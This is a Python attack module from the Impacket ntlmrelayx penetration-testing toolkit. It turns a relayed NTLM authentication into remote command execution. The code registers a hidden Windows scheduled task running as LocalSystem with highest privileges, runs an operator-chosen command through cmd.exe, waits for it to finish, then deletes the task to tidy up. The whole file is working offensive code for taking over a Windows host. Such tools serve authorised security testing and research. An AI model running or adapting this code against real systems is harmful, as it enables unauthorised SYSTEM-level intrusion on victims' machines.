1# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
2#
3# This software is provided under a slightly modified version
4# of the Apache Software License. See the accompanying LICENSE file
5# for more information.
6#
7# Authors:
8# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
9# Based on @agsolino and @_dirkjan code
10#
12import time
13import string
14import random
16from impacket import LOG
17from impacket.dcerpc.v5 import tsch
18from impacket.dcerpc.v5.dtypes import NULL
19from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
# Name of the attack class exported by this module.
# NOTE(review): presumably read by the ntlmrelayx attack loader to pick the
# class to instantiate — confirm against the loader; not visible here.
PROTOCOL_ATTACK_CLASS = "RPCAttack"
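class TSCHRPCAttack:
    """Run ``self.config.command`` on the relay target through the Task Scheduler (TSCH) RPC interface.

    This is a mixin: it relies on ``self.dce``, ``self.config`` and
    ``self.stringbinding`` being set by the concrete attack class (see
    ``RPCAttack``, whose ``__init__`` assigns them).
    """

    def _xml_escape(self, data):
        """Return *data* with the five XML special characters replaced by entities.

        Each input character is looked up once, so ``&`` is never
        double-escaped.  Characters outside the table pass through unchanged.

        :param data: text that is about to be embedded in the task XML
        :return: escaped copy of *data*
        """
        replace_table = {
            "&": "&amp;",
            '"': "&quot;",
            "'": "&apos;",
            ">": "&gt;",
            "<": "&lt;",
        }
        return ''.join(replace_table.get(c, c) for c in data)

    def _run(self):
        """Register, start, await and delete a scheduled task that executes the configured command.

        The task definition below is hidden, runs as LocalSystem (S-1-5-18)
        with ``RunLevel`` HighestAvailable, and executes ``cmd.exe /C <command>``.
        No output is collected ("no output mode"): completion is detected by
        polling ``SchRpcGetLastRunInfo`` until the scheduler reports a
        last-run time, after which the task is deleted.

        There is no try/finally around the RPC sequence: if a call fails
        after ``SchRpcRegisterTask`` succeeded, the task stays registered on
        the target.  Whatever the ``tsch`` helpers raise propagates to the
        caller.
        """
        # Random 8-letter task name, registered at the root task folder ("\name").
        tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
        taskPath = '\\%s' % tmpName

        cmd = "cmd.exe"
        args = "/C %s" % self.config.command

        LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))

        # Both substituted values are XML-escaped so the command text cannot
        # break (or alter) the structure of the task document.
        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>%s</Command>
      <Arguments>%s</Arguments>
    </Exec>
  </Actions>
</Task>
        """ % (self._xml_escape(cmd), self._xml_escape(args))

        LOG.info('Creating task %s' % taskPath)
        tsch.hSchRpcRegisterTask(self.dce, taskPath, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)

        LOG.info('Running task %s' % taskPath)
        tsch.hSchRpcRun(self.dce, taskPath)

        # Poll until the scheduler reports a last-run time (wYear becomes non-zero).
        # NOTE(review): there is no upper bound on this wait; a task that never
        # starts keeps the loop spinning with a 2 s sleep per iteration.
        while True:
            LOG.debug('Calling SchRpcGetLastRunInfo for %s' % taskPath)
            resp = tsch.hSchRpcGetLastRunInfo(self.dce, taskPath)
            if resp['pLastRuntime']['wYear'] != 0:
                break
            time.sleep(2)

        LOG.info('Deleting task %s' % taskPath)
        tsch.hSchRpcDelete(self.dce, taskPath)
        LOG.info('Completed!')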
class RPCAttack(ProtocolAttack, TSCHRPCAttack):
    """ntlmrelayx attack plugin for relayed RPC connections.

    Every relayed connection is currently treated as a Task Scheduler
    (TSCH) endpoint and handed to ``TSCHRPCAttack._run``.
    """

    PLUGIN_NAMES = ["RPC"]

    def __init__(self, config, dce, username):
        """Keep the relayed DCE/RPC connection and record its string binding for log messages.

        :param config: attack configuration; ``config.command`` selects what is run
        :param dce: authenticated DCE/RPC connection obtained from the relay
        :param username: forwarded unchanged to ``ProtocolAttack.__init__``
        """
        ProtocolAttack.__init__(self, config, dce, username)
        self.dce = dce
        self.rpctransport = dce.get_rpc_transport()
        self.stringbinding = self.rpctransport.get_stringbinding()

    def run(self):
        """Execute the attack on the relayed connection.

        Without a configured command nothing is done except logging an
        error; otherwise the TSCH implementation is invoked.
        """
        # Assume the endpoint is TSCH
        # TODO: support relaying RPC to different endpoints
        # TODO: support for providing a shell
        # TODO: support for getting an output
        if self.config.command is None:
            LOG.error("No command provided to attack")
            return
        TSCHRPCAttack._run(self)